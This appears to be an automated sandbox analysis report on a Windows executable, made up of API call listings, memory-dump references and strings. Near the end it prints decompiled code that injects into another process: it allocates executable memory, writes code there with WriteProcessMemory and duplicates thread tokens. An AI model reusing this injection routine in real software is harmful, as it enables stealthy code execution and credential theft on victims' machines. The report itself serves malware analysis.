                                • memcpy.MSVCRT ref: 0040A94F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcslen.MSVCRT ref: 0040B1DE
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                • memcpy.MSVCRT ref: 0040B248
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ??3@$memcpy$mallocwcslen
                                • String ID:
                                • API String ID: 3023356884-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: memcpy
                                • String ID: @
                                • API String ID: 3510742995-2766056989
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID:
                                • API String ID: 1865533344-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • strlen.MSVCRT ref: 0040B0D8
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                  • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                  • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                • memcpy.MSVCRT ref: 0040B159
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ??3@$memcpy$mallocstrlen
                                • String ID:
                                • API String ID: 1171893557-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 004144E7
                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                  • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                • memset.MSVCRT ref: 0041451A
                                • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                • String ID:
                                • API String ID: 1127616056-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: sqlite_master
                                • API String ID: 438689982-3163232059
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                • wcscpy.MSVCRT ref: 00414DF3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                • String ID:
                                • API String ID: 3917621476-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                • _snwprintf.MSVCRT ref: 00410FE1
                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                • _snwprintf.MSVCRT ref: 0041100C
                                • wcscat.MSVCRT ref: 0041101F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                • String ID:
                                • API String ID: 822687973-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,0041755F,?), ref: 00417452
                                • malloc.MSVCRT ref: 00417459
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74B05970,?,0041755F,?), ref: 00417478
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                • RegisterClassW.USER32(00000001), ref: 00412428
                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: HandleModule$ClassCreateRegisterWindow
                                • String ID:
                                • API String ID: 2678498856-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: MessageSend$Item
                                • String ID:
                                • API String ID: 3888421826-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00417B7B
                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                • GetLastError.KERNEL32 ref: 00417BB5
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: File$ErrorLastLockUnlockmemset
                                • String ID:
                                • API String ID: 3727323765-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                • malloc.MSVCRT ref: 00417407
                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ByteCharMultiWide$??3@malloc
                                • String ID:
                                • API String ID: 4284152360-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040F673
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                • strlen.MSVCRT ref: 0040F6A2
                                • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040F6E2
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                • strlen.MSVCRT ref: 0040F70D
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00402FD7
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                • strlen.MSVCRT ref: 00403006
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                • String ID:
                                • API String ID: 2754987064-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                • String ID:
                                • API String ID: 764393265-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Time$System$File$LocalSpecific
                                • String ID:
                                • API String ID: 979780441-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.MSVCRT ref: 004134E0
                                • memcpy.MSVCRT ref: 004134F2
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$DialogHandleModuleParam
                                • String ID:
                                • API String ID: 1386444988-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: InvalidateMessageRectSend
                                • String ID: d=E
                                • API String ID: 909852535-3703654223
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • wcschr.MSVCRT ref: 0040F79E
                                • wcschr.MSVCRT ref: 0040F7AC
                                  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                  • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcschr$memcpywcslen
                                • String ID: "
                                • API String ID: 1983396471-123907689
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                • _memicmp.MSVCRT ref: 0040C00D
                                • memcpy.MSVCRT ref: 0040C024
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FilePointer_memicmpmemcpy
                                • String ID: URL
                                • API String ID: 2108176848-3574463123
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintfmemcpy
                                • String ID: %2.2X
                                • API String ID: 2789212964-323797159
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _snwprintf
                                • String ID: %%-%d.%ds
                                • API String ID: 3988819677-2008345750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                • memset.MSVCRT ref: 00401917
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PlacementWindowmemset
                                • String ID: WinPos
                                • API String ID: 4036792311-2823255486
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                • wcsrchr.MSVCRT ref: 0040DCE9
                                • wcscat.MSVCRT ref: 0040DCFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileModuleNamewcscatwcsrchr
                                • String ID: _lng.ini
                                • API String ID: 383090722-1948609170
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                • String ID: SHGetSpecialFolderPathW$shell32.dll
                                • API String ID: 2773794195-880857682
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: LongWindow
                                • String ID: MZ@
                                • API String ID: 1378638983-2978689999
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcpy$memset
                                • String ID:
                                • API String ID: 438689982-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcmp.MSVCRT ref: 00408AF3
                                  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                  • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                • memcmp.MSVCRT ref: 00408B2B
                                • memcmp.MSVCRT ref: 00408B5C
                                • memcpy.MSVCRT ref: 00408B79
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID:
                                • API String ID: 231171946-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: wcslen$wcscat$wcscpy
                                • String ID:
                                • API String ID: 1961120804-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                C-Code - Quality: 42%
                                			E004049E6(void* __eflags, intOrPtr _a4, void* _a8, long _a12) {
                                				void* _v12;
                                				char _v16;
                                				void* _v20;
                                				void* _v24;
                                				long _v28;
                                				long _v32;
                                				long _v36;
                                				long _v48;
                                				void* _v52;
                                				void* _v56;
                                				_Unknown_base(*)()* _v188;
                                				_Unknown_base(*)()* _v192;
                                				void _v196;
                                				void _v200;
                                				long _v204;
                                				void _v356;
                                				void _v360;
                                				void* __ebx;
                                				void* __edi;
                                				long _t78;
                                				void* _t80;
                                				_Unknown_base(*)()* _t85;
                                				_Unknown_base(*)()* _t87;
                                				_Unknown_base(*)()* _t89;
                                				_Unknown_base(*)()* _t91;
                                				void* _t96;
                                				void* _t97;
                                				long _t119;
                                				void* _t121;
                                				struct HINSTANCE__* _t124;
                                				long _t126;
                                				void* _t129;
                                				void* _t137;
                                
                                				_v28 = 0;
                                				_t78 = E004043E4(); // executed
                                				if(_t78 != 0) {
                                					_t80 = OpenProcess(0x1f0fff, 0, _t78);
                                					_v12 = _t80;
                                					if(_t80 != 0) {
                                						_v200 = 0;
                                						memset( &_v196, 0, 0x9c);
                                						_v16 = 0;
                                						_t124 = GetModuleHandleA("kernel32.dll");
                                						0x411ba1( &_v16);
                                						_push("GetModuleHandleA");
                                						_push(_t124);
                                						if(_v16 == 0) {
                                							_t85 = GetProcAddress();
                                						} else {
                                							_t85 = _v16();
                                						}
                                						_v200 = _t85;
                                						0x411ba1( &_v16);
                                						_push("GetProcAddress");
                                						_push(_t124);
                                						if(_v16 == 0) {
                                							_t87 = GetProcAddress();
                                						} else {
                                							_t87 = _v16();
                                						}
                                						_v196 = _t87;
                                						0x411ba1( &_v16);
                                						_push("WriteProcessMemory");
                                						_push(_t124);
                                						if(_v16 == 0) {
                                							_t89 = GetProcAddress();
                                						} else {
                                							_t89 = _v16();
                                						}
                                						_v192 = _t89;
                                						0x411ba1( &_v16);
                                						_push("LocalFree");
                                						_push(_t124);
                                						if(_v16 == 0) {
                                							_t91 = GetProcAddress();
                                						} else {
                                							_t91 = _v16();
                                						}
                                						_v188 = _t91;
                                						_v20 = VirtualAllocEx(_v12, 0, 0xa0, 0x1000, 4);
                                						_v24 = VirtualAllocEx(_v12, 0, 0x400, 0x1000, 0x40);
                                						_t96 = VirtualAllocEx(_v12, 0, _a12 + _a12, 0x1000, 4);
                                						_t126 = _a12;
                                						_v52 = _t96;
                                						_t97 = VirtualAllocEx(_v12, 0, _t126, 0x1000, 4);
                                						_v56 = _t97;
                                						_v48 = _t126;
                                						if(_v20 != 0 && _v24 != 0 && _v52 != 0 && _t126 != 0) {
                                							WriteProcessMemory(_v12, _t97, _a8, _t126, 0);
                                							E0040496D( &_v200, _a4);
                                							WriteProcessMemory(_v12, _v24, E00404185, 0x400, 0);
                                							WriteProcessMemory(_v12, _v20,  &_v200, 0xa0, 0);
                                							_a12 = 0;
                                							_v36 = 0;
                                							_v32 = 0;
                                							0x411fc6(_v12, _v24, _v20,  &_a12);
                                							_t137 =  &_v36;
                                							E004044DE(_t137);
                                							ResumeThread(_t137);
                                							WaitForSingleObject(_t137, 0x3a98);
                                							CloseHandle(_t137);
                                							_v360 = 0;
                                							memset( &_v356, 0, 0x9c);
                                							ReadProcessMemory(_v12, _v20,  &_v360, 0xa0, 0);
                                							_t119 = _v204;
                                							if(_t119 - 1 <= 0xffffe) {
                                								_t121 = _t119 + 0x10;
                                								0x413d5c(_t121);
                                								_t129 = _t121;
                                								if(ReadProcessMemory(_v12, _v52, _t129, _v204, 0) != 0) {
                                									_v28 = E00404915(_t129, _v204, _a4);
                                								}
                                								0x413d56(_t129);
                                							}
                                							if(_v36 != 0) {
                                								FreeLibrary(_v36);
                                							}
                                						}
                                						VirtualFreeEx(_v12, _v20, 0, 0x8000);
                                						VirtualFreeEx(_v12, _v24, 0, 0x8000);
                                						VirtualFreeEx(_v12, _v52, 0, 0x8000);
                                						VirtualFreeEx(_v12, _v56, 0, 0x8000);
                                						CloseHandle(_v12);
                                					}
                                				}
                                				return _v28;
                                			}

                                APIs
                                  • Part of subcall function 004043E4: memset.MSVCRT ref: 00404406
                                  • Part of subcall function 004043E4: GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0040442B
                                  • Part of subcall function 004043E4: _mbscpy.MSVCRT ref: 0040443E
                                  • Part of subcall function 004043E4: memcpy.MSVCRT ref: 004044BD
                                • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,00000000,00000000), ref: 00404A0B
                                • memset.MSVCRT ref: 00404A2F
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404A3F
                                  • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                  • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                  • Part of subcall function 00411BA1: GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                  • Part of subcall function 00411BA1: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                  • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C15
                                  • Part of subcall function 00411BA1: strlen.MSVCRT ref: 00411C22
                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleA), ref: 00404A66
                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00404A87
                                • GetProcAddress.KERNEL32(00000000,WriteProcessMemory), ref: 00404AA8
                                • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 00404AC9
                                  • Part of subcall function 00411FC6: GetVersionExA.KERNEL32(?,00000000,000000A0), ref: 00411FE0
                                  • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,DuplicateToken), ref: 0040451C
                                  • Part of subcall function 004044DE: GetProcAddress.KERNEL32(00000000,SetThreadToken), ref: 00404543
                                  • Part of subcall function 004044DE: CloseHandle.KERNEL32(?), ref: 00404553
                                  • Part of subcall function 004044DE: CloseHandle.KERNEL32(?,00000000,000000A0,000000FF,0000000E,?,?,0040428D), ref: 0040455D
                                  • Part of subcall function 004044DE: FreeLibrary.KERNEL32(00000000,000000FF,0000000E,?,?,0040428D), ref: 0040456E
                                • VirtualAllocEx.KERNEL32(00000000,00000000,000000A0,00001000,00000004), ref: 00404AE8
                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 00404AF9
                                • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B0B
                                • VirtualAllocEx.KERNEL32(00000000,00000000,0040428D,00001000,00000004), ref: 00404B1B
